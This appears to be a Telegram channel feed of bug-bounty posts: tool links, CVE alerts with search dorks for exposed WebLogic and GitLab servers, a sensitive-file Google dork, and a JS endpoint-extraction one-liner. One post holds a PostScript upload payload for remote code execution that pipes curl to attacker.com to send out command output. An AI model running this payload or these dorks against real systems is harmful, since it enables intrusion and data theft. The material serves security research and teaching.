Brut Security
15.9K subscribers
1.06K photos
92 videos
300 files
1.14K links
βœ…DM: @wtf_brut
πŸ›ƒWhatsApp: https://wa.link/brutsecurity
🈴Training: https://brutsecurity.com
πŸ“¨Mail: info@brutsec.com
Download Telegram
⚑️Smart contract security report. It contains 2 High, 6 Medium & 8 Low severity issues.

βœ…
https://github.com/gkrastenov/audits/blob/main/solo/SpartaDex-Security-Review.md
❀9πŸ‘2
πŸ—Ώ17
πŸ‘14
Does anyone have Aura+ Songs Playlist ? Do Drop in Comments! Thank You.
🀨4πŸ—Ώ4
β˜„οΈRCE On PDF Upload: https://hackerone.com/reports/403417

Content-Disposition: form-data; name="fileToUpload"; filename="pwn.pdf"Content-Type: application/pdf

%!PS
currentdevice null true mark /OutputICCProfile (%pipe%curl
http://attacker.com/?a=$(whoami|base64) ).putdeviceparams
quit
Please open Telegram to view this post
VIEW IN TELEGRAM
πŸ”₯8πŸ‘1
⚑WayBackup Finder - A passive way to find backups/ sensitive information.
⚠️https://github.com/anmolksachan/WayBackupFinder
Please open Telegram to view this post
VIEW IN TELEGRAM
πŸ‘9❀1
A Visual Guide to Recon
πŸ”₯5πŸ‘1
CVE-2025-21535: Server Takeover in Oracle WebLogic, 9.8 rating πŸ”₯

An easily exploitable vulnerability in the Core component allows an unauthenticated attacker to remotely compromise a WebLogic server.

Search at Netlas.io:
πŸ‘‰ Link: https://nt.ls/6EpWK
πŸ‘‰ Dork: protocol:t3 OR protocol:t3s

Vendor's advisory: https://www.oracle.com/security-alerts/cpujan2025.html#AppendixFMW
πŸ‘6🫑1
β˜„οΈHExHTTP - HExHTTP is a tool designed to perform tests on HTTP headers and analyze the results to identify vulnerabilities and interesting behaviors.

⚠️https://github.com/c0dejump/HExHTTP
Please open Telegram to view this post
VIEW IN TELEGRAM
πŸ‘11πŸ”₯5❀3
▢️Explore Bug Bounty POC Videos: https://t.me/brutsecurity_poc
Please open Telegram to view this post
VIEW IN TELEGRAM
Brut Security pinned «▢️Explore Bug Bounty POC Videos: https://t.me/brutsecurity_pocΒ»
πŸ‘8❀3
New Business Logic POC Video Shared -https://t.me/brutsecurity_poc/9
πŸ”₯4❀1
CVE-2025-0314 and other: Multiple vulnerabilities in GitLab, 4.3 - 8.7 rating❗️

In a recent advisory, GitLab writed about three vulnerabilities, including stored XSS, resource exhaustion, and protected CI/CD variables exfiltration.

Search at Netlas.io:
πŸ‘‰ Link: https://nt.ls/BNKS8
πŸ‘‰ Dork: http.favicon.hash_sha256:72a2cad5025aa931d6ea56c3201d1f18e68a8cd39788c7c80d5b2b82aa5143ef OR http.headers.set_cookie:"gitlab" OR http.headers.location:"gitlab"

Vendor's advisory: https://about.gitlab.com/releases/2025/01/22/patch-release-gitlab-17-8-1-released/
🀝4
β˜„οΈInformation Disclosure Dorkβ˜„οΈ

site:*.example.com (ext:doc OR ext:docx OR ext:odt OR ext:pdf OR ext:rtf OR ext:ppt OR ext:pptx OR ext:csv OR ext:xls OR ext:xlsx OR ext:txt OR ext:xml OR ext:json OR ext:zip OR ext:rar OR ext:md OR ext:log OR ext:bak OR ext:conf OR ext:sql)
Please open Telegram to view this post
VIEW IN TELEGRAM
πŸ‘16πŸ”₯13❀1
▢️Automated JS Endpoint Extraction and Verification with HTTPX and GAU
echo "target.com" | gau --blacklist jpg,jpeg,gif,css,tif,tiff,png,ttf,woff,woff2,ico,pdf,svg \| grep -E "\.js($|\?.*)" \
| httpx -er "(?:(https?|ftp|git|ssh|telnet|smtp|imap|pop3|ldap|sftp|smb|nfs|rtmp|rtsp|ws|wss|irc|news|gopher|rsync|data):\/\/|\/)[^\s\"'\*\(\){};\\\^\$\&<>/\\?#]+(?:\?[^\s\"'<>/\\?#]+)?(?:\/[^\s\"'<>/\\?#]+)*" \-json -mr "application/javascript|text/javascript" \
| jq -r '.extracts[]' | tr -d '[],'
Please open Telegram to view this post
VIEW IN TELEGRAM
❀20πŸ”₯16🐳1
Where is the reaction guys? It's a good way to support the channel, so please do leave your reaction to grow this community. Thanks!

⚠️Join Our Discussion Group - https://t.me/brutsec
Please open Telegram to view this post
VIEW IN TELEGRAM
❀16🐳10πŸ”₯5
❀16πŸ”₯3πŸ‘¨β€πŸ’»1